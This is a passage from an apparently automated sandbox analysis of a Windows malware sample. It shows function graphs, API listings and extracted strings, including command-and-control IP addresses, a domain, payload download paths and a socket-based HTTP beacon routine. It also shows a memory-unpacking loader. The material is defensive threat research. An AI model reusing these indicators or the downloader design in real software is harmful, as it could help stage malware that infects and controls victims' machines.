425bcf-425db7 call 403491 * 15 call 40197c call 403491 * 15 call 40197c call 401b41 * 2 call 401adf * 2 call 426504 519->613 614 425acc-425ba6 call 40b5a0 call 403491 * 12 call 40197c call 42631a call 426217 519->614 529->519 729 425e2b-425e3b call 4019f8 * 2 613->729 730 425db9-425e02 call 40b5a0 call 410c91 call 4262d2 call 426217 613->730 679 425bc2-425bc9 call 40ff7e 614->679 680 425ba8-425bba call 401b1e call 426260 614->680 686 425bce 679->686 691 425bbf 680->691 686->613 691->679 729->499 742 425e04-425e16 call 401b1e call 426260 730->742 743 425e1e-425e25 call 40ff7e 730->743 749 425e1b 742->749 747 425e2a 743->747 747->729 749->743
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00426354: __EH_prolog.LIBCMT ref: 00426359
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043CEE4), ref: 00424C05
                                                                                                                                                                                                                                    • Part of subcall function 00425EE2: __EH_prolog.LIBCMT ref: 00425EE7
                                                                                                                                                                                                                                    • Part of subcall function 00425EE2: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00425FC9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
                                                                                                                                                                                                                                  • String ID: /1/Qg_Appv5.exe$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$Qg_Appv5.exe$SOFTWARE\BroomCleaner$eight$five$four$nine$note.padd.cn.com$one$seven$six$sub=([\w-]{1,255})$ten$three$two
                                                                                                                                                                                                                                  • API String ID: 2531350358-4166474000
                                                                                                                                                                                                                                  • Opcode ID: ae36505b5daff832a18cd0001135b0aff67938ad5caa572e98a89e9e35783f3c
                                                                                                                                                                                                                                  • Instruction ID: b94a07167da01af8c51153bc4f1e8c174558d31be475b6648fa5fcd106bc986c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae36505b5daff832a18cd0001135b0aff67938ad5caa572e98a89e9e35783f3c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3A2211050A2E19AC712FB75589758A2FE51B6630DF54A87FE5D03F2A3C97C820C87AF
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00426504 Relevance: 48.4, APIs: 16, Strings: 11, Instructions: 1148networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 750 426504-427062 call 4275a4 call 403491 * 15 call 40197c call 403491 * 14 call 40197c call 403491 * 17 call 40197c call 403491 * 7 call 40197c call 403491 * 2 call 40197c call 403491 * 2 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 401b1e call 401a67 call 401aa1 call 403491 * 9 call 40197c call 401aa1 * 2 call 403491 * 6 call 40197c call 401aa1 call 401a67 call 401aa1 * 2 call 403491 * 12 call 40197c call 401aa1 call 403491 * 61 call 40197c call 401aa1 call 403491 * 55 call 40197c call 401aa1 * 2 1223 427068-42706b 750->1223 1224 42717c-42719d call 401aa1 WSAStartup 750->1224 1223->1224 1226 427071-427177 call 403491 * 16 call 40197c call 401aa1 call 403ae1 call 401ac2 call 401ae8 call 401aa1 1223->1226 1229 4271a3-4271b9 socket 1224->1229 1230 427571 1224->1230 1226->1224 1233 4271d0-4271e3 call 401a67 gethostbyname 1229->1233 1234 4271bb-4271cb call 40ff7e WSACleanup 1229->1234 1232 427574-42757d call 40ff7e 1230->1232 1244 42757e-427585 WSACleanup closesocket 1232->1244 1233->1232 1246 4271e9-427225 call 40aaa0 htons connect 1233->1246 1245 42758b-4275a3 call 401ae8 1234->1245 1244->1245 1246->1232 1254 42722b-427247 call 403da5 call 401a67 send 1246->1254 1254->1232 1264 42724d-427251 1254->1264 1266 427253-427263 send 1264->1266 1267 427269-42728d call 40b5a0 1264->1267 1266->1232 1266->1267 1274 42728f-4272a3 recv 1267->1274 1274->1232 1276 4272a9-4272ae 1274->1276 1278 4273b6-4273bf 1276->1278 1279 4272b4-4272bc 1276->1279 1278->1232 1280 4273c5-4273c8 1278->1280 1279->1278 1282 4272c2-4272ca 1279->1282 1280->1274 1282->1278 1284 4272d0-4272db 1282->1284 1286 427300-427309 1284->1286 1287 4272dd-4272f2 call 412faf 1284->1287 1289 42730c-427311 1286->1289 1287->1232 1295 4272f8-4272fb 1287->1295 1289->1289 1293 427313-427315 1289->1293 1296 42731b-427330 call 403a0c 1293->1296 1297 4273cd-4273d2 1293->1297 1299 4273ad-4273b3 1295->1299 1296->1299 1311 427332-427352 call 412faf 1296->1311 1301 4273d4-4273d8 1297->1301 1302 4273df-4273e3 1297->1302 1299->1278 1305 4273da 1301->1305 1306 4273e9-427405 call 426127 1301->1306 1302->1306 1307 427515-427517 1302->1307 1305->1232 1318 427408-42740a 1306->1318 1309 42755b-427568 call 426127 1307->1309 1310 427519-427532 call 426127 1307->1310 1323 42756a-42756f 1309->1323 1326 427535-427548 recv 1310->1326 1327 427376-42738e call 412faf 1311->1327 1328 427354-42736e call 41196d 1311->1328 1324 42740d-427421 recv 1318->1324 1323->1244 1324->1232 1330 427427-42742c 1324->1330 1326->1232 1332 42754a-427557 1326->1332 1327->1299 1340 427390-4273aa call 412faf 1327->1340 1328->1232 1344 427374 1328->1344 1335 427432-427437 1330->1335 1336 4274fb-427502 1330->1336 1332->1326 1338 427559 1332->1338 1335->1336 1341 42743d-427442 1335->1341 1336->1324 1342 427508 1336->1342 1338->1323 1340->1299 1341->1336 1346 427448-427469 call 41196d 1341->1346 1342->1232 1344->1299 1346->1232 1353 42746f-427471 1346->1353 1353->1232 1355 427477 1353->1355 1358 42750a-427513 1355->1358 1359 42747d-427489 1355->1359 1358->1323 1361 4274a5-4274a7 1359->1361 1362 42748b-4274a2 call 42611d 1359->1362 1365 4274aa-4274c0 recv 1361->1365 1362->1361 1365->1232 1366 4274c6-4274d3 1365->1366 1366->1365 1368 4274d5-4274e7 recv 1366->1368 1368->1232 1369 4274ed-4274f6 1368->1369 1369->1318
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00426509
                                                                                                                                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 00427195
                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 004271AB
                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 004271C5
                                                                                                                                                                                                                                  • gethostbyname.WS2_32(00000000), ref: 004271D9
                                                                                                                                                                                                                                  • htons.WS2_32(?), ref: 0042720B
                                                                                                                                                                                                                                  • connect.WS2_32(00000000,?,00000010), ref: 0042721C
                                                                                                                                                                                                                                  • send.WS2_32(00000000,00000000,00000000,00000000), ref: 0042723F
                                                                                                                                                                                                                                  • send.WS2_32(00000000,00000000,?,00000000), ref: 0042725B
                                                                                                                                                                                                                                  • recv.WS2_32(00000000,00000000,00000001,00000000), ref: 0042729B
                                                                                                                                                                                                                                  • recv.WS2_32(?,00000000,00000001,00000000), ref: 00427419
                                                                                                                                                                                                                                  • recv.WS2_32(?,?,00000000,00000000), ref: 004274B8
                                                                                                                                                                                                                                  • recv.WS2_32(?,0000000A,00000002,00000000), ref: 004274DF
                                                                                                                                                                                                                                  • recv.WS2_32(00000000,?,?,00000000), ref: 00427540
                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 0042757E
                                                                                                                                                                                                                                  • closesocket.WS2_32(?), ref: 00427585
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: recv$Cleanupsend$H_prologStartupclosesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                  • String ID: HTTP/1.1$185.172.128.90$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
                                                                                                                                                                                                                                  • API String ID: 791229064-3676584321
                                                                                                                                                                                                                                  • Opcode ID: 7bc742ea917e032f14d27c255483df2a22af7a2c11a4f1ddb339e58efc080f3d
                                                                                                                                                                                                                                  • Instruction ID: 5d172c2dbe9bbe0c33395fe13eab479c6144de839071dc58773496d8017457fc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7bc742ea917e032f14d27c255483df2a22af7a2c11a4f1ddb339e58efc080f3d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F092661090A2A19ACB02FFB5689649E7FF55A1630DB14747FE5907F3D3CA2C8209C76E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004139E7 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1697 4139e7-4139f3 call 4177fa 1700 413a15-413a21 call 413a6c ExitProcess 1697->1700 1701 4139f5-413a03 GetPEB 1697->1701 1701->1700 1703 413a05-413a0f GetCurrentProcess TerminateProcess 1701->1703 1703->1700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00413A21
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                  • Opcode ID: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
                                                                                                                                                                                                                                  • Instruction ID: 5487a5d46cc6b628b64d0aabb319d5eb223523a794a7473b7ec3082598feaf8f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2E04F31101504ABCF116F14DD08A9A3B29FF04386F454029F84656131CF39DE83CA48
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 040CCCD6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1742 40cccd6-40cccef 1743 40cccf1-40cccf3 1742->1743 1744 40cccfa-40ccd06 CreateToolhelp32Snapshot 1743->1744 1745 40cccf5 1743->1745 1746 40ccd08-40ccd0e 1744->1746 1747 40ccd16-40ccd23 Module32First 1744->1747 1745->1744 1746->1747 1752 40ccd10-40ccd14 1746->1752 1748 40ccd2c-40ccd34 1747->1748 1749 40ccd25-40ccd26 call 40cc995 1747->1749 1753 40ccd2b 1749->1753 1752->1743 1752->1747 1753->1748
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 040CCCFE
                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 040CCD1E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2259248364.00000000040CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CC000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_40cc000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                  • Instruction ID: 9d19e0bb7558537807994e931cf64508a97659187c15565e8aeb969a0dd86e75
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACF06231500715ABF7203BF9E88CA6E76E9EF49665F14052CF64BF20C0DA70F8468661
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041919A Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: aa56684864c8632bf99b39259769552b117b79340854f3fab038ab321572be05
                                                                                                                                                                                                                                  • Instruction ID: cb3ffe6ea045fbb478305932556cdcbc34478d372374edfe54fef2084c460810
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa56684864c8632bf99b39259769552b117b79340854f3fab038ab321572be05
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3421B072C012049BDB41AFAAC8117DD37A06F16334F11068BE864AB2E2C7BC9D918B6D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041A36B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1370 41a36b-41a39b call 41a0ce 1373 41a3b6-41a3c2 call 41e7d7 1370->1373 1374 41a39d-41a3a8 call 41236e 1370->1374 1379 41a3c4-41a3d9 call 41236e call 412381 1373->1379 1380 41a3db-41a424 call 41a039 1373->1380 1381 41a3aa-41a3b1 call 412381 1374->1381 1379->1381 1390 41a491-41a49a GetFileType 1380->1390 1391 41a426-41a42f 1380->1391 1388 41a68d-41a693 1381->1388 1392 41a4e3-41a4e6 1390->1392 1393 41a49c-41a4cd GetLastError call 41234b CloseHandle 1390->1393 1395 41a431-41a435 1391->1395 1396 41a466-41a48c GetLastError call 41234b 1391->1396 1399 41a4e8-41a4ed 1392->1399 1400 41a4ef-41a4f5 1392->1400 1393->1381 1409 41a4d3-41a4de call 412381 1393->1409 1395->1396 1401 41a437-41a464 call 41a039 1395->1401 1396->1381 1404 41a4f9-41a547 call 41e720 1399->1404 1400->1404 1405 41a4f7 1400->1405 1401->1390 1401->1396 1412 41a557-41a57b call 419dec 1404->1412 1413 41a549-41a555 call 41a24a 1404->1413 1405->1404 1409->1381 1420 41a57d 1412->1420 1421 41a58e-41a5d1 1412->1421 1413->1412 1419 41a57f-41a589 call 4163fd 1413->1419 1419->1388 1420->1419 1423 41a5d3-41a5d7 1421->1423 1424 41a5f2-41a600 1421->1424 1423->1424 1428 41a5d9-41a5ed 1423->1428 1425 41a606-41a60a 1424->1425 1426 41a68b 1424->1426 1425->1426 1429 41a60c-41a63f CloseHandle call 41a039 1425->1429 1426->1388 1428->1424 1432 41a641-41a66d GetLastError call 41234b call 41e8e9 1429->1432 1433 41a673-41a687 1429->1433 1432->1433 1433->1426
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041A039: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041A056
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041A47F
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0041A486
                                                                                                                                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 0041A492
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041A49C
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0041A4A5
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041A4C5
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0041A60F
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041A641
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0041A648
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                  • Opcode ID: 0df5222a233c6114ee027709094600eef7ff1df3394e17eab98b892044d57319
                                                                                                                                                                                                                                  • Instruction ID: 1a6929838056931ddf07ca16ed76f5c23edfa2113b557bae9411180e0ac2dad7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0df5222a233c6114ee027709094600eef7ff1df3394e17eab98b892044d57319
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAA13632A041188FDF19DF68D8517EE7BA1AF06324F14015EEC51EB391DB398DA2CB5A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004192AD Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1438 4192ad-4192bd 1439 4192d7-4192d9 1438->1439 1440 4192bf-4192d2 call 41236e call 412381 1438->1440 1442 419641-41964e call 41236e call 412381 1439->1442 1443 4192df-4192e5 1439->1443 1457 419659 1440->1457 1459 419654 call 410905 1442->1459 1443->1442 1444 4192eb-419316 1443->1444 1444->1442 1447 41931c-419325 1444->1447 1450 419327-41933a call 41236e call 412381 1447->1450 1451 41933f-419341 1447->1451 1450->1459 1455 419347-41934b 1451->1455 1456 41963d-41963f 1451->1456 1455->1456 1462 419351-419355 1455->1462 1460 41965c-419661 1456->1460 1457->1460 1459->1457 1462->1450 1465 419357-41936e 1462->1465 1467 419370-419373 1465->1467 1468 41938b-419394 1465->1468 1469 419375-41937b 1467->1469 1470 41937d-419386 1467->1470 1471 4193b2-4193bc 1468->1471 1472 419396-4193ad call 41236e call 412381 call 410905 1468->1472 1469->1470 1469->1472 1476 419427-419441 1470->1476 1474 4193c3-4193e1 call 417a45 call 41629a * 2 1471->1474 1475 4193be-4193c0 1471->1475 1501 419574 1472->1501 1511 4193e3-4193f9 call 412381 call 41236e 1474->1511 1512 4193fe-419424 call 419800 1474->1512 1475->1474 1478 419515-41951e call 421229 1476->1478 1479 419447-419457 1476->1479 1490 419591 1478->1490 1491 419520-419532 1478->1491 1479->1478 1483 41945d-41945f 1479->1483 1483->1478 1487 419465-41948b 1483->1487 1487->1478 1492 419491-4194a4 1487->1492 1494 419595-4195ad ReadFile 1490->1494 1491->1490 1496 419534-419543 GetConsoleMode 1491->1496 1492->1478 1497 4194a6-4194a8 1492->1497 1499 419609-419614 GetLastError 1494->1499 1500 4195af-4195b5 1494->1500 1496->1490 1502 419545-419549 1496->1502 1497->1478 1503 4194aa-4194d5 1497->1503 1505 419616-419628 call 412381 call 41236e 1499->1505 1506 41962d-419630 1499->1506 1500->1499 1507 4195b7 1500->1507 1509 419577-419581 call 41629a 1501->1509 1502->1494 1508 41954b-419565 ReadConsoleW 1502->1508 1503->1478 1510 4194d7-4194ea 1503->1510 1505->1501 1519 419636-419638 1506->1519 1520 41956d-419573 call 41234b 1506->1520 1515 4195ba-4195cc 1507->1515 1517 419567 GetLastError 1508->1517 1518 419586-41958f 1508->1518 1509->1460 1510->1478 1522 4194ec-4194ee 1510->1522 1511->1501 1512->1476 1515->1509 1526 4195ce-4195d2 1515->1526 1517->1520 1518->1515 1519->1509 1520->1501 1522->1478 1523 4194f0-419510 1522->1523 1523->1478 1532 4195d4-4195e4 call 418fc9 1526->1532 1533 4195eb-4195f6 1526->1533 1544 4195e7-4195e9 1532->1544 1538 419602-419607 call 418e09 1533->1538 1539 4195f8 call 419119 1533->1539 1545 4195fd-419600 1538->1545 1539->1545 1544->1509 1545->1544
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 997ea1e074bed25bc4bbba2399cba16e5922d8a4b1bc8de6d13cd7412f5484b7
                                                                                                                                                                                                                                  • Instruction ID: 1de375e9a44cfea9a4e980cda881e291b4907b82d4d6a27c77cd479f01cc8893
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 997ea1e074bed25bc4bbba2399cba16e5922d8a4b1bc8de6d13cd7412f5484b7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BCC12B71E04249AFDB11CFA9C851BEE7BB1BF19314F04019AE854B7392C7789D81CB69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BD003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1546 5bd003c-5bd0047 1547 5bd004c-5bd0263 call 5bd0a3f call 5bd0e0f call 5bd0d90 VirtualAlloc 1546->1547 1548 5bd0049 1546->1548 1563 5bd028b-5bd0292 1547->1563 1564 5bd0265-5bd0289 call 5bd0a69 1547->1564 1548->1547 1566 5bd02a1-5bd02b0 1563->1566 1567 5bd02ce-5bd03c2 VirtualProtect call 5bd0cce call 5bd0ce7 1564->1567 1566->1567 1568 5bd02b2-5bd02cc 1566->1568 1575 5bd03d1-5bd03e0 1567->1575 1568->1566 1576 5bd0439-5bd04b8 VirtualFree 1575->1576 1577 5bd03e2-5bd0437 call 5bd0ce7 1575->1577 1579 5bd04be-5bd04cd 1576->1579 1580 5bd05f4-5bd05fe 1576->1580 1577->1575 1582 5bd04d3-5bd04dd 1579->1582 1583 5bd077f-5bd0789 1580->1583 1584 5bd0604-5bd060d 1580->1584 1582->1580 1589 5bd04e3-5bd0505 LoadLibraryA 1582->1589 1587 5bd078b-5bd07a3 1583->1587 1588 5bd07a6-5bd07b0 1583->1588 1584->1583 1585 5bd0613-5bd0637 1584->1585 1590 5bd063e-5bd0648 1585->1590 1587->1588 1591 5bd086e-5bd08be LoadLibraryA 1588->1591 1592 5bd07b6-5bd07cb 1588->1592 1593 5bd0517-5bd0520 1589->1593 1594 5bd0507-5bd0515 1589->1594 1590->1583 1597 5bd064e-5bd065a 1590->1597 1602 5bd08c7-5bd08f9 1591->1602 1595 5bd07d2-5bd07d5 1592->1595 1596 5bd0526-5bd0547 1593->1596 1594->1596 1598 5bd0824-5bd0833 1595->1598 1599 5bd07d7-5bd07e0 1595->1599 1600 5bd054d-5bd0550 1596->1600 1597->1583 1601 5bd0660-5bd066a 1597->1601 1608 5bd0839-5bd083c 1598->1608 1603 5bd07e4-5bd0822 1599->1603 1604 5bd07e2 1599->1604 1605 5bd0556-5bd056b 1600->1605 1606 5bd05e0-5bd05ef 1600->1606 1607 5bd067a-5bd0689 1601->1607 1609 5bd08fb-5bd0901 1602->1609 1610 5bd0902-5bd091d 1602->1610 1603->1595 1604->1598 1611 5bd056d 1605->1611 1612 5bd056f-5bd057a 1605->1612 1606->1582 1613 5bd068f-5bd06b2 1607->1613 1614 5bd0750-5bd077a 1607->1614 1608->1591 1615 5bd083e-5bd0847 1608->1615 1609->1610 1611->1606 1617 5bd057c-5bd0599 1612->1617 1618 5bd059b-5bd05bb 1612->1618 1619 5bd06ef-5bd06fc 1613->1619 1620 5bd06b4-5bd06ed 1613->1620 1614->1590 1621 5bd0849 1615->1621 1622 5bd084b-5bd086c 1615->1622 1629 5bd05bd-5bd05db 1617->1629 1618->1629 1623 5bd06fe-5bd0748 1619->1623 1624 5bd074b 1619->1624 1620->1619 1621->1591 1622->1608 1623->1624 1624->1607 1629->1600
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 05BD024D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2279821604.0000000005BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_5bd0000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                  • Instruction ID: 3dcfaa7b78ad33e72f642000e24d0c8bec40ef6446ea0992723490af3af8ea7d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
